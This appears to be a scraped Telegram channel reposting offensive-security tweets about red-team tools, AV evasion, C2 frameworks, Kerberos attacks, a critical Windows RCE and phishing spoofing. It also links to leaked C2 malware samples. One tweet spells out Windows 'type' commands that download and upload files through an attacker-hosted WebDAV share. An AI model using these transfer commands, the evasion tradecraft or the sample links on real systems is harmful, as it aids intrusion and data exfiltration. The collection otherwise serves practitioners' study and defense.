This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ Cneelis, Cn33liz ]
It is #BOFFriday again!
Today's release:
> Klist, a BOF implementation to display Kerberos tickets.
> Psk, display loaded kernel modules and summarise installed security products.
Check out the @OutflankNL C2-Tool-Collection repo: https://t.co/Wq1obZlEtk
🔗 https://github.com/outflanknl/C2-Tool-Collection
🐥 [ tweet ]
It is #BOFFriday again!
Today's release:
> Klist, a BOF implementation to display Kerberos tickets.
> Psk, display loaded kernel modules and summarise installed security products.
Check out the @OutflankNL C2-Tool-Collection repo: https://t.co/Wq1obZlEtk
🔗 https://github.com/outflanknl/C2-Tool-Collection
🐥 [ tweet ]
😈 [ chvancooten, Cas van Cooten ]
I have to say, using #ChatGPT as a Telegram bot works impressively well
(Script: https://t.co/vxDGzGaa9K)
🔗 https://github.com/m1guelpf/chatgpt-telegram
🐥 [ tweet ]
I have to say, using #ChatGPT as a Telegram bot works impressively well
(Script: https://t.co/vxDGzGaa9K)
🔗 https://github.com/m1guelpf/chatgpt-telegram
🐥 [ tweet ]
😈 [ KlezVirus, d3adc0de ]
[BLOG POST] And as promised, this is a brief article the describing the technique used within SilentMoonwalk. Might be a good weekend read!
https://t.co/FUnW2Ca6VP
🔗 https://klezvirus.github.io/RedTeaming/AV_Evasion/StackSpoofing/
🐥 [ tweet ]
[BLOG POST] And as promised, this is a brief article the describing the technique used within SilentMoonwalk. Might be a good weekend read!
https://t.co/FUnW2Ca6VP
🔗 https://klezvirus.github.io/RedTeaming/AV_Evasion/StackSpoofing/
🐥 [ tweet ]
😈 [ x86matthew, x86matthew ]
StealthHook - A method for hooking functions without modifying memory protection.
This tool automatically discovers writable global pointers/vtable entries that are nested within the target function, enabling stealthy function hooking and interception.
https://t.co/vdrNVTdMnd
🔗 https://www.x86matthew.com/view_post?id=stealth_hook
🐥 [ tweet ]
StealthHook - A method for hooking functions without modifying memory protection.
This tool automatically discovers writable global pointers/vtable entries that are nested within the target function, enabling stealthy function hooking and interception.
https://t.co/vdrNVTdMnd
🔗 https://www.x86matthew.com/view_post?id=stealth_hook
🐥 [ tweet ]
😈 [ ippsec, ippsec ]
#HackTheBox Outdated video is up! The box features Folina, Shadow Credentials, and some lateral movement by injecting a malicious windows update with SharpWSUS.
https://t.co/od5IlQk33s
🔗 https://youtu.be/TR132R1h3Ds
🐥 [ tweet ]
#HackTheBox Outdated video is up! The box features Folina, Shadow Credentials, and some lateral movement by injecting a malicious windows update with SharpWSUS.
https://t.co/od5IlQk33s
🔗 https://youtu.be/TR132R1h3Ds
🐥 [ tweet ]
🔥4
😈 [ Mr_0rng, mr.0range ]
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext
#lolbin #redteam
(Bonus ADS 😆)
🐥 [ tweet ]
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext
#lolbin #redteam
(Bonus ADS 😆)
🐥 [ tweet ]
😈 [ netbiosX, netbiosX 🦄 ]
DynamicDotNet - A collection of various and sundry code snippets that leverage .NET dynamic tradecraft by @bohops https://t.co/G7aW8NIUXw #redteam
🔗 https://github.com/bohops/DynamicDotNet
🐥 [ tweet ]
DynamicDotNet - A collection of various and sundry code snippets that leverage .NET dynamic tradecraft by @bohops https://t.co/G7aW8NIUXw #redteam
🔗 https://github.com/bohops/DynamicDotNet
🐥 [ tweet ]
😈 [ m2rc_p, marc ]
My page about AV Evasion for HackTricks just got merged!
Tried to include mostly methodology of modern techniques and also included some practical examples.
· Generic Evasion Methodology
· Dll Sideloading
· AMSI
· SmartScreen & MoTW
· C# Reflection
https://t.co/xYAUtLJRDj
🔗 https://book.hacktricks.xyz/windows-hardening/av-bypass
🐥 [ tweet ]
My page about AV Evasion for HackTricks just got merged!
Tried to include mostly methodology of modern techniques and also included some practical examples.
· Generic Evasion Methodology
· Dll Sideloading
· AMSI
· SmartScreen & MoTW
· C# Reflection
https://t.co/xYAUtLJRDj
🔗 https://book.hacktricks.xyz/windows-hardening/av-bypass
🐥 [ tweet ]
🔥1
Forwarded from Внутрянка
Статья про shadow credentials
Ardent101
Kerberos для специалиста по тестированию на проникновение. Часть 6. PKINIT
В статье рассматривается устройство одного из расширений протокола Kerberos - PKINIT. После теоретической вводной будут разобраны техники проведения атак, связанные с указанным расширением, в частности: Shadow Credentials и UnPAC the hash.
Если вкратце, то…
Если вкратце, то…
🔥5
😈 [ c2_matrix, C2 Matrix | #C2Matrix ]
Thanks to those that have reached out to add C2s to #C2Matrix
- RedditC2 from @kleiton0x7e @t4tch3r_: https://t.co/TIQ7xJyTmb
- RedbloodC2: https://t.co/YK3FuwpFzB
Remember anyone can contribute: https://t.co/sG8nRGxKmg
Golden source is Google Sheet: https://t.co/wy6vaeeKG5
🔗 https://github.com/kleiton0x00/RedditC2
🔗 https://github.com/kira2040k/RedbloodC2
🔗 https://howto.thec2matrix.com/contribute
🔗 https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=0
🐥 [ tweet ]
Thanks to those that have reached out to add C2s to #C2Matrix
- RedditC2 from @kleiton0x7e @t4tch3r_: https://t.co/TIQ7xJyTmb
- RedbloodC2: https://t.co/YK3FuwpFzB
Remember anyone can contribute: https://t.co/sG8nRGxKmg
Golden source is Google Sheet: https://t.co/wy6vaeeKG5
🔗 https://github.com/kleiton0x00/RedditC2
🔗 https://github.com/kira2040k/RedbloodC2
🔗 https://howto.thec2matrix.com/contribute
🔗 https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=0
🐥 [ tweet ]
🔥1
😈 [ r3dy__, Royce Davis ]
Here’s some installation instructions that don’t suck. More to come!
https://t.co/hEOp4NUsTB
🔗 https://realhax.gitbook.io/capsulecorp-pentest/setup/windows
🐥 [ tweet ]
Here’s some installation instructions that don’t suck. More to come!
https://t.co/hEOp4NUsTB
🔗 https://realhax.gitbook.io/capsulecorp-pentest/setup/windows
🐥 [ tweet ]
это лаба для инфры отсюда, ес че https://livebook.manning.com/book/penetrating-enterprise-networks (неплохой generic-материал по внутрякам)😈 [ Flangvik, Melvin langvik ]
Updated SharpCollection! Snaffler @mikeloss , Whisker @elad_shamir and PassTheCert @AlmondOffSec has been added
https://t.co/2l3oQhZLpk
🔗 https://github.com/Flangvik/SharpCollection
🐥 [ tweet ]
Updated SharpCollection! Snaffler @mikeloss , Whisker @elad_shamir and PassTheCert @AlmondOffSec has been added
https://t.co/2l3oQhZLpk
🔗 https://github.com/Flangvik/SharpCollection
🐥 [ tweet ]
😈 [ _nwodtuhs, Charlie Bromberg “Shutdown” ]
Thank you @BlWasp_ for adding Active Directory's SCCM / MECM abuse to https://t.co/L1mByz3R9Z
🔗 https://www.thehacker.recipes/ad/movement/sccm-mecm
🐥 [ tweet ]
Thank you @BlWasp_ for adding Active Directory's SCCM / MECM abuse to https://t.co/L1mByz3R9Z
🔗 https://www.thehacker.recipes/ad/movement/sccm-mecm
🐥 [ tweet ]
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ chompie1337, chompie ]
Demonstrating CVE-2022-37958 RCE Vuln. Reachable via any Windows application protocol that authenticates. Yes, that means RDP, SMB and many more. Please patch this one, it's serious!
https://t.co/ikOrTvQIJs
🔗 https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/
🐥 [ tweet ]
Demonstrating CVE-2022-37958 RCE Vuln. Reachable via any Windows application protocol that authenticates. Yes, that means RDP, SMB and many more. Please patch this one, it's serious!
https://t.co/ikOrTvQIJs
🔗 https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/
🐥 [ tweet ]
🔥4
😈 [ pdiscoveryio, ProjectDiscovery.io ]
Automating @pdnuclei with JupiterOne
https://t.co/Y7lbt6HISP
#hackwithautomation
🔗 https://www.jupiterone.com/blog/automating-nuclei-with-jupiterone/
🐥 [ tweet ]
Automating @pdnuclei with JupiterOne
https://t.co/Y7lbt6HISP
#hackwithautomation
🔗 https://www.jupiterone.com/blog/automating-nuclei-with-jupiterone/
🐥 [ tweet ]
😈 [ 424f424f, rvrsh3ll ]
Ok fellow phishers. @Microsoft keeps harassing me via email to correct my blog post. How many of you have had success spoofing with this technique this last year? Time for them to fix this?
https://t.co/TTiUEbZhpI
🔗 https://www.blackhillsinfosec.com/spoofing-microsoft-365-like-its-1995/
🐥 [ tweet ]
Ok fellow phishers. @Microsoft keeps harassing me via email to correct my blog post. How many of you have had success spoofing with this technique this last year? Time for them to fix this?
https://t.co/TTiUEbZhpI
🔗 https://www.blackhillsinfosec.com/spoofing-microsoft-365-like-its-1995/
🐥 [ tweet ]
😈 [ 404death, sailay(valen) ]
I just created the tool which can help to get NT AUTHORITY\SYSTEM from arbitrary directory creation bugs.
https://t.co/Mcv4HH2olT
🔗 https://github.com/binderlabs/DirCreate2System
🐥 [ tweet ]
I just created the tool which can help to get NT AUTHORITY\SYSTEM from arbitrary directory creation bugs.
https://t.co/Mcv4HH2olT
🔗 https://github.com/binderlabs/DirCreate2System
🐥 [ tweet ]
😈 [ _nwodtuhs, Charlie Bromberg “Shutdown” ]
Thank you @BlWasp_ for contributing to The Hacker Tools, documenting Impacket's ping, ping6, GetNPUsers and GetUserSPNs example noscripts
- https://t.co/h3gTvWV4ia
- https://t.co/PRR2wdZkcT
- https://t.co/tApF0oAmBx
- https://t.co/GM1yyW78sF
https://t.co/PjOo8FoZ0p
🔗 https://tools.thehacker.recipes/impacket/examples/ping.py
🔗 https://tools.thehacker.recipes/impacket/examples/ping6.py
🔗 https://tools.thehacker.recipes/impacket/examples/getnpusers.py
🔗 https://tools.thehacker.recipes/impacket/examples/getuserspns.py
🔗 https://tools.thehacker.recipes/impacket/examples
🐥 [ tweet ]
Thank you @BlWasp_ for contributing to The Hacker Tools, documenting Impacket's ping, ping6, GetNPUsers and GetUserSPNs example noscripts
- https://t.co/h3gTvWV4ia
- https://t.co/PRR2wdZkcT
- https://t.co/tApF0oAmBx
- https://t.co/GM1yyW78sF
https://t.co/PjOo8FoZ0p
🔗 https://tools.thehacker.recipes/impacket/examples/ping.py
🔗 https://tools.thehacker.recipes/impacket/examples/ping6.py
🔗 https://tools.thehacker.recipes/impacket/examples/getnpusers.py
🔗 https://tools.thehacker.recipes/impacket/examples/getuserspns.py
🔗 https://tools.thehacker.recipes/impacket/examples
🐥 [ tweet ]
😈 [ NinjaParanoid, Chetan Nayak (Brute Ratel C4 Author) ]
Heres all the nighthawk samples which mdsec tried to hide by blasting VT with fake samples. Enjoy hunting TAs! Sharing for attribution purposes!
https://t.co/Nrlr6CU7TF
https://t.co/7V8r5QObeP
https://t.co/lWNZctPTy8
https://t.co/aIg3QecyTg
https://t.co/ERvg61wELk
🔗 https://anonfiles.com/H1N4XbIby5/f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e_exe
🔗 https://anonfiles.com/IbN5X4Ify4/b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94_exe
🔗 https://anonfiles.com/JfN1XcIfy1/9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8_exe
🔗 https://anonfiles.com/K3N4X0Iby5/0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988_exe
🔗 https://anonfiles.com/E7tdy5J0y4/ea7a1363c5f304c206bc8450ed1d4b14d76eb492a1011b8f2c1d2f218de8c770
🐥 [ tweet ]
Heres all the nighthawk samples which mdsec tried to hide by blasting VT with fake samples. Enjoy hunting TAs! Sharing for attribution purposes!
https://t.co/Nrlr6CU7TF
https://t.co/7V8r5QObeP
https://t.co/lWNZctPTy8
https://t.co/aIg3QecyTg
https://t.co/ERvg61wELk
🔗 https://anonfiles.com/H1N4XbIby5/f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e_exe
🔗 https://anonfiles.com/IbN5X4Ify4/b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94_exe
🔗 https://anonfiles.com/JfN1XcIfy1/9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8_exe
🔗 https://anonfiles.com/K3N4X0Iby5/0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988_exe
🔗 https://anonfiles.com/E7tdy5J0y4/ea7a1363c5f304c206bc8450ed1d4b14d76eb492a1011b8f2c1d2f218de8c770
🐥 [ tweet ]